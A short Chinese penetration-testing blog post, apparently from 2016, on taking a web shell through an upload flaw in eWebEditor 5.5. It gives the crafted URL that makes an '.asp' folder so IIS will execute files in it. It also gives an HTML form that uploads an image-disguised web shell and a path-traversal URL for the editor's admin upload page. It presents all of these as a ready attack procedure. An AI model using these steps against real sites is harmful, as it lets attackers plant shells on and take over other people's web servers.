ewebeditor 5.5 构造上传漏洞拿shell

CracerCracer 2016-4-15 渗透测试 8,363 0 15
一个改版的EWEB 5.5漏洞
先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action=”http://www.cracer.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。
作者 伟大娃娃
第2个漏洞就是:可以直接http://www.cracer.com/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=..构造跳转目录。可以跳转到网站根目录,如果目录级别高的话,dir=../../这样来跳转。

转载请注明来自Cracer,本文标题:《ewebeditor 5.5 构造上传漏洞拿shell》

喜欢 (15) 发布评论
发表评论


Top